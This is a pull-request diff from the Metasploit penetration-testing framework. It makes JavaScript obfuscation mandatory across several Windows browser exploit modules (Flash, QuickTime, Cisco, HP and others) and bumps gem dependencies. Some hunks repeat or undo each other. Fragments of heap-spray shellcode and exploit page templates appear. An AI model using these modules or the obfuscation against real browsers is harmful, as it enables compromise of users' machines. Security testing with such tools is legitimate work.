### PR TITLE
Change the OBFUSCATE datastore option to JsObfuscate

### DIFF
--- a/Gemfile
+++ b/Gemfile
@@ -8,9 +8,9 @@ group :db do
   gem 'activerecord', '>= 3.0.0', '< 4.0.0'
 
   # Metasploit::Credential database models
-  gem 'metasploit-credential', '~> 0.10.1'
+  gem 'metasploit-credential', '~> 0.12.0'
   # Database models shared between framework and Pro.
-  gem 'metasploit_data_models', '~> 0.20.1'
+  gem 'metasploit_data_models', '~> 0.21.1'
   # Needed for module caching in Mdm::ModuleDetails
   gem 'pg', '>= 0.11'
 end
@@ -39,7 +39,7 @@ group :development, :test do
   gem 'rspec', '>= 2.12', '< 3.0.0'
   # Define `rake spec`.  Must be in development AND test so that its available by default as a rake test when the
   # environment is development
-  gem 'rspec-rails' , '>= 2.12', '< 3.0.0' 
+  gem 'rspec-rails' , '>= 2.12', '< 3.0.0'
 end
 
 group :pcap do

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -5,7 +5,7 @@ PATH
       actionpack (< 4.0.0)
       activesupport (>= 3.0.0, < 4.0.0)
       bcrypt
-      jsobfu (~> 0.1.7)
+      jsobfu (~> 0.2.0)
       json
       metasploit-concern (~> 0.2.1)
       metasploit-model (~> 0.27.1)
@@ -91,7 +91,7 @@ GEM
     hike (1.2.3)
     i18n (0.6.11)
     journey (1.0.4)
-    jsobfu (0.1.7)
+    jsobfu (0.2.0)
       rkelly-remix (= 0.0.6)
     json (1.8.1)
     mail (2.5.4)

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -7,13 +7,14 @@ PATH
       bcrypt
       jsobfu (~> 0.2.0)
       json
-      metasploit-concern (~> 0.2.1)
-      metasploit-model (~> 0.27.1)
+      metasploit-concern (~> 0.3.0)
+      metasploit-model (~> 0.28.0)
       meterpreter_bins (= 0.0.7)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
       railties
+      recog (~> 1.0)
       robots
       rubyzip (~> 1.1)
       sqlite3
@@ -91,34 +92,35 @@ GEM
     hike (1.2.3)
     i18n (0.6.11)
     journey (1.0.4)
-    jsobfu (0.2.0)
+    jsobfu (0.2.1)
       rkelly-remix (= 0.0.6)
     json (1.8.1)
     mail (2.5.4)
       mime-types (~> 1.16)
       treetop (~> 1.4.8)
-    metasploit-concern (0.2.1)
+    metasploit-concern (0.3.0)
       activesupport (~> 3.0, >= 3.0.0)
       railties (< 4.0.0)
-    metasploit-credential (0.10.1)
-      metasploit-concern (~> 0.2.1)
-      metasploit-model (~> 0.27.0)
-      metasploit_data_models (~> 0.20.0)
+    metasploit-credential (0.12.0)
+      metasploit-concern (~> 0.3.0)
+      metasploit-model (~> 0.28.0)
+      metasploit_data_models (~> 0.21.0)
       pg
       railties (< 4.0.0)
       rubyntlm
       rubyzip (~> 1.1)
-    metasploit-model (0.27.1)
+    metasploit-model (0.28.0)
       activesupport
       railties (< 4.0.0)
-    metasploit_data_models (0.20.1)
+    metasploit_data_models (0.21.1)
       activerecord (>= 3.2.13, < 4.0.0)
       activesupport
       arel-helpers
-      metasploit-concern (~> 0.2.1)
-      metasploit-model (~> 0.27.0)
+      metasploit-concern (~> 0.3.0)
+      metasploit-model (~> 0.28.0)
       pg
       railties (< 4.0.0)
+      recog (~> 1.0)
     meterpreter_bins (0.0.7)
     method_source (0.8.2)
     mime-types (1.25.1)
@@ -161,6 +163,8 @@ GEM
     rake (10.3.2)
     rdoc (3.12.2)
       json (~> 1.4)
+    recog (1.0.0)
+      nokogiri
     redcarpet (3.1.2)
     rkelly-remix (0.0.6)
     robots (0.10.1)
@@ -218,9 +222,9 @@ DEPENDENCIES
   factory_girl (>= 4.1.0)
   factory_girl_rails
   fivemat (= 1.2.1)
-  metasploit-credential (~> 0.10.1)
+  metasploit-credential (~> 0.12.0)
   metasploit-framework!
-  metasploit_data_models (~> 0.20.1)
+  metasploit_data_models (~> 0.21.1)
   network_interface (~> 0.0.1)
   pcaprub
   pg (>= 0.11)

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (~> 0.3.0)
       metasploit-model (~> 0.28.0)
-      meterpreter_bins (= 0.0.7)
+      meterpreter_bins (= 0.0.10)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -121,11 +121,11 @@ GEM
       pg
       railties (< 4.0.0)
       recog (~> 1.0)
-    meterpreter_bins (0.0.7)
+    meterpreter_bins (0.0.10)
     method_source (0.8.2)
     mime-types (1.25.1)
     mini_portile (0.6.0)
-    msgpack (0.5.8)
+    msgpack (0.5.9)
     multi_json (1.0.4)
     network_interface (0.0.1)
     nokogiri (1.6.3.1)

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (~> 0.3.0)
       metasploit-model (~> 0.28.0)
-      meterpreter_bins (= 0.0.7)
+      meterpreter_bins (= 0.0.10)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -121,7 +121,7 @@ GEM
       pg
       railties (< 4.0.0)
       recog (~> 1.0)
-    meterpreter_bins (0.0.7)
+    meterpreter_bins (0.0.10)
     method_source (0.8.2)
     mime-types (1.25.1)
     mini_portile (0.6.0)

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (~> 0.3.0)
       metasploit-model (~> 0.28.0)
-      meterpreter_bins (= 0.0.10)
+      meterpreter_bins (= 0.0.7)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -121,7 +121,7 @@ GEM
       pg
       railties (< 4.0.0)
       recog (~> 1.0)
-    meterpreter_bins (0.0.10)
+    meterpreter_bins (0.0.7)
     method_source (0.8.2)
     mime-types (1.25.1)
     mini_portile (0.6.0)

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -65,7 +65,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model', '~> 0.28.0'
   # Needed for Meterpreter on Windows, soon others.
-  spec.add_runtime_dependency 'meterpreter_bins', '0.0.7'
+  spec.add_runtime_dependency 'meterpreter_bins', '0.0.10'
   # Needed by msfgui and other rpc components
   spec.add_runtime_dependency 'msgpack'
   # Needed by anemone crawler

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -56,7 +56,7 @@ Gem::Specification.new do |spec|
   # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
   spec.add_runtime_dependency 'bcrypt'
   # Needed for Javascript obfuscation
-  spec.add_runtime_dependency 'jsobfu', '~> 0.1.7'
+  spec.add_runtime_dependency 'jsobfu', '~> 0.2.0'
   # Needed for some admin modules (scrutinizer_add_user.rb)
   spec.add_runtime_dependency 'json'
   # Metasploit::Concern hooks

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -60,10 +60,10 @@ Gem::Specification.new do |spec|
   # Needed for some admin modules (scrutinizer_add_user.rb)
   spec.add_runtime_dependency 'json'
   # Metasploit::Concern hooks
-  spec.add_runtime_dependency 'metasploit-concern', '~> 0.2.1'
+  spec.add_runtime_dependency 'metasploit-concern', '~> 0.3.0'
   # Things that would normally be part of the database model, but which
   # are needed when there's no database
-  spec.add_runtime_dependency 'metasploit-model', '~> 0.27.1'
+  spec.add_runtime_dependency 'metasploit-model', '~> 0.28.0'
   # Needed for Meterpreter on Windows, soon others.
   spec.add_runtime_dependency 'meterpreter_bins', '0.0.7'
   # Needed by msfgui and other rpc components
@@ -82,4 +82,6 @@ Gem::Specification.new do |spec|
   spec.add_runtime_dependency 'sqlite3'
   # required for Time::TZInfo in ActiveSupport
   spec.add_runtime_dependency 'tzinfo'
+  # required for OS fingerprinting
+  spec.add_runtime_dependency 'recog', '~> 1.0'
 end

--- a/modules/exploits/windows/browser/adobe_flash_rtmp.rb
+++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
@@ -11,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
   include Msf::Exploit::Remote::BrowserAutopwn
+  include Msf::Exploit::JSObfu
 
   autopwn_info({
     :os_name    => OperatingSystems::WINDOWS,
@@ -98,9 +100,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
     register_options(
       [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]),
         OptAddress.new('RTMPHOST', [ true, "The local host to RTMP service listen on. This must be an address on the local machine or 0.0.0.0", '0.0.0.0' ]),
-        OptPort.new('RTMPPORT',    [ true, "The local port to RTMP service listen on.", 1935 ]),
+        OptPort.new('RTMPPORT',    [ true, "The local port to RTMP service listen on.", 1935 ])
       ], self.class
     )
 
@@ -369,11 +370,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     js = heaplib(js, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js).obfuscate
 
     swf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
     swf_uri << "/#{rand_text_alpha(rand(6)+3)}.swf"

--- a/modules/exploits/windows/browser/adobe_flash_rtmp.rb
+++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb
@@ -387,7 +387,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js.to_s}
+    #{js}
     </script>
     </head>
     <body>

--- a/modules/exploits/windows/browser/adobe_flash_rtmp.rb
+++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb
@@ -387,7 +387,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js}
+    #{js.to_s}
     </script>
     </head>
     <body>

--- a/modules/exploits/windows/browser/adobe_flash_rtmp.rb
+++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb
@@ -370,7 +370,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     js = heaplib(js, {:noobfu => true})
-    js = js_obfuscate(js).obfuscate
+    js = js_obfuscate(js)
 
     swf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
     swf_uri << "/#{rand_text_alpha(rand(6)+3)}.swf"

--- a/modules/exploits/windows/browser/adobe_flash_sps.rb
+++ b/modules/exploits/windows/browser/adobe_flash_sps.rb
@@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote
     JS
 
     js = heaplib(js, {:noobfu => true})
-    js = js_obfuscate(js).obfuscate.to_s
+    js = js_obfuscate(js).to_s
 
     myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
     mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4"

--- a/modules/exploits/windows/browser/adobe_flash_sps.rb
+++ b/modules/exploits/windows/browser/adobe_flash_sps.rb
@@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote
     JS
 
     js = heaplib(js, {:noobfu => true})
-    js = js_obfuscate(js).to_s
+    js = js_obfuscate(js)
 
     myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
     mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4"

--- a/modules/exploits/windows/browser/adobe_flash_sps.rb
+++ b/modules/exploits/windows/browser/adobe_flash_sps.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::JSObfu
 
   def initialize(info={})
     super(update_info(info,
@@ -60,11 +62,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Aug 9 2011",
       'DefaultTarget'  => 0))
-
-      register_options(
-        [
-          OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
-        ], self.class)
   end
 
   def get_target(agent)
@@ -138,11 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote
     JS
 
     js = heaplib(js, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js).obfuscate.to_s
 
     myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
     mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4"

--- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
@@ -227,7 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote
     JS
 
     js = heaplib(js, {:noobfu => true} )
-    js = js_obfuscate(js).obfuscate.to_s
+    js = js_obfuscate(js).to_s
 
     trigger_file_name = "#{get_resource}/#{rand_text_alpha(rand(3))}.swf"
 

--- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
@@ -4,12 +4,14 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
+  include Msf::Exploit::JSObfu
 
   def initialize(info={})
     super(update_info(info,
@@ -111,13 +113,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Apr 11 2011",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', true])
-      ], self.class
-    )
-
   end
 
   def exploit
@@ -232,12 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote
     JS
 
     js = heaplib(js, {:noobfu => true} )
-
-    #Javascript obfuscation is optional
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js).obfuscate.to_s
 
     trigger_file_name = "#{get_resource}/#{rand_text_alpha(rand(3))}.swf"
 

--- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
@@ -227,7 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote
     JS
 
     js = heaplib(js, {:noobfu => true} )
-    js = js_obfuscate(js).to_s
+    js = js_obfuscate(js)
 
     trigger_file_name = "#{get_resource}/#{rand_text_alpha(rand(3))}.swf"
 

--- a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
@@ -182,7 +182,7 @@ heapSpray(myoffset,myshellcode,myfillsled);
 
       content =  "<html>"
       content << "<head><script>"
-      content << "#{js.to_s}"
+      content << "#{js}"
       content << "</script></head>"
       content << "<body>"
       content << <<-ENDEMBED

--- a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
@@ -11,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::Remote::Egghunter
   include Msf::Exploit::RopDb
+  include Msf::Exploit::JSObfu
 
   #include Msf::Exploit::Remote::BrowserAutopwn
   #autopwn_info({
@@ -83,12 +85,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => 'Nov 07 2012',
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class
-    )
   end
 
   def get_target(agent)
@@ -182,14 +178,11 @@ var myfillsled = unescape("#{js_fill}");
 heapSpray(myoffset,myshellcode,myfillsled);
       JSSPRAY
 
-      if datastore['OBFUSCATE']
-        js = ::Rex::Exploitation::JSObfu.new(js)
-        js.obfuscate
-      end
+      js = js_obfuscate(js)
 
       content =  "<html>"
       content << "<head><script>"
-      content << "#{js}"
+      content << "#{js.to_s}"
       content << "</script></head>"
       content << "<body>"
       content << <<-ENDEMBED

--- a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::JSObfu
 
   #include Msf::Exploit::Remote::BrowserAutopwn
   #autopwn_info({
@@ -65,11 +67,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => 'Nov 07 2012',
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
-      ], self.class)
   end
 
   def get_target(agent)
@@ -214,12 +211,6 @@ for (var i=0; i < 1600; i++) {
 
         #Use heaplib
         js_spray = heaplib(spray)
-
-        #obfuscate on demand
-        if datastore['OBFUSCATE']
-          js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
-          js_spray.obfuscate
-        end
       else
         js_spray = <<-JS
 var shellcode = unescape("#{code}");
@@ -235,11 +226,13 @@ for (i = 0; i < 750; i++){ memory[i] = block + shellcode }
         JS
       end
 
+      js_spray = js_obfuscate(js_spray)
+
       content =  "<html>"
       content << <<-JSPRAY
 <head>
 <script>
-#{js_spray}
+#{js_spray.to_s}
 </script>
 </head>
       JSPRAY

--- a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
@@ -232,7 +232,7 @@ for (i = 0; i < 750; i++){ memory[i] = block + shellcode }
       content << <<-JSPRAY
 <head>
 <script>
-#{js_spray.to_s}
+#{js_spray}
 </script>
 </head>
       JSPRAY

--- a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
+++ b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::JSObfu
 
   def initialize(info={})
     super(update_info(info,
@@ -51,11 +53,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Feb 17 2012",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
-      ], self.class)
   end
 
   def get_target(agent)
@@ -131,11 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote
     obj.MsgBox(arg1, arg2, 2);
     JS
 
-    #obfuscate on demand
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js).to_s
 
     html = <<-EOS
     <html>

--- a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
+++ b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
@@ -128,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote
     obj.MsgBox(arg1, arg2, 2);
     JS
 
-    js = js_obfuscate(js).to_s
+    js = js_obfuscate(js)
 
     html = <<-EOS
     <html>

--- a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
+++ b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
@@ -4,12 +4,14 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::Remote::Seh
+  include Msf::Exploit::JSObfu
   #include Msf::Exploit::Remote::BrowserAutopwn
   #
   #autopwn_info({
@@ -98,12 +100,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => 'Mar 22 2012',
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class
-    )
 
   end
 
@@ -225,11 +221,7 @@ class Metasploit3 < Msf::Exploit::Remote
       js = get_spray(my_target, js_code, js_nops)
 
       js = heaplib(js, {:noobfu => true})
-
-      if datastore['OBFUSCATE']
-        js = ::Rex::Exploitation::JSObfu.new(js)
-        js.obfuscate
-      end
+      js = js_obfuscate(js).to_s
     end
 
     sploit = get_payload(my_target)

--- a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
+++ b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
@@ -221,7 +221,7 @@ class Metasploit3 < Msf::Exploit::Remote
       js = get_spray(my_target, js_code, js_nops)
 
       js = heaplib(js, {:noobfu => true})
-      js = js_obfuscate(js).to_s
+      js = js_obfuscate(js)
     end
 
     sploit = get_payload(my_target)

--- a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
+++ b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
@@ -409,7 +409,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js.to_s}
+    #{js}
     </script>
     </head>
     <body>

--- a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
+++ b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
@@ -4,12 +4,14 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::Remote::Seh
+  include Msf::Exploit::JSObfu
   #include Msf::Exploit::Remote::BrowserAutopwn
   #
   #autopwn_info({
@@ -143,12 +145,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => 'Jul 17 2012',
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class
-    )
 
   end
 
@@ -399,11 +395,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     js = heaplib(js, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js)
 
     sploit = "http://"
     sploit << "\x0c" * 261
@@ -417,7 +409,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js}
+    #{js.to_s}
     </script>
     </head>
     <body>

--- a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
+++ b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
@@ -253,7 +253,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js.to_s}
+  #{js}
     </script>
     </head>
     <body>

--- a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
+++ b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
@@ -4,12 +4,14 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
+  include Msf::Exploit::JSObfu
   #include Msf::Exploit::Remote::BrowserAutopwn
   #
   #autopwn_info({
@@ -100,12 +102,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Dec 14 2010",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
-
   end
 
   def get_target(agent)
@@ -158,11 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote
     |
 
     js = heaplib(js, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js)
 
     return js
   end
@@ -261,7 +253,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js}
+    #{js.to_s}
     </script>
     </head>
     <body>

--- a/modules/exploits/windows/browser/honeywell_tema_exec.rb
+++ b/modules/exploits/windows/browser/honeywell_tema_exec.rb
@@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <body>
     </object>
     <script>
-    #{js.to_s}
+    #{js}
     </script>
     </body>
     </html>

--- a/modules/exploits/windows/browser/honeywell_tema_exec.rb
+++ b/modules/exploits/windows/browser/honeywell_tema_exec.rb
@@ -4,12 +4,14 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::EXE
+  include Msf::Exploit::JSObfu
 
   def initialize(info={})
     super(update_info(info,
@@ -55,11 +57,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Oct 20 2011",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
   end
 
   def exploit
@@ -143,19 +140,14 @@ class Metasploit3 < Msf::Exploit::Remote
       EOS
     end
 
-    js.gsub!(/\t\t\t/, "")
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js)
 
     html = <<-EOS
     <html>
     <body>
     </object>
     <script>
-    #{js}
+    #{js.to_s}
     </script>
     </body>
     </html>

--- a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
+++ b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::JSObfu
   #include Msf::Exploit::Remote::BrowserAutopwn
   #autopwn_info({
   #  :ua_name    => HttpClients::IE,
@@ -72,11 +74,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Aug 29 2012",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
   end
 
   def get_target(agent)
@@ -167,11 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     js = heaplib(js, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js)
 
     return js
   end
@@ -233,7 +226,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js}
+    #{js.to_s}
     </script>
     </head>
     <body>

--- a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
+++ b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
@@ -226,7 +226,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js.to_s}
+    #{js}
     </script>
     </head>
     <body>

--- a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb
+++ b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb
@@ -211,7 +211,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js.to_s}
+    #{js}
     </script>
     </head>
     <body>

--- a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb
+++ b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb
@@ -4,12 +4,14 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
+  include Msf::Exploit::JSObfu
   #include Msf::Exploit::Remote::BrowserAutopwn
   #
   #autopwn_info({
@@ -73,12 +75,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Jul 24 2013",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
-
   end
 
   def get_target(agent)
@@ -176,11 +172,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     js = heaplib(js, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js)
 
     return js
   end
@@ -219,7 +211,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js}
+    #{js.to_s}
     </script>
     </head>
     <body>

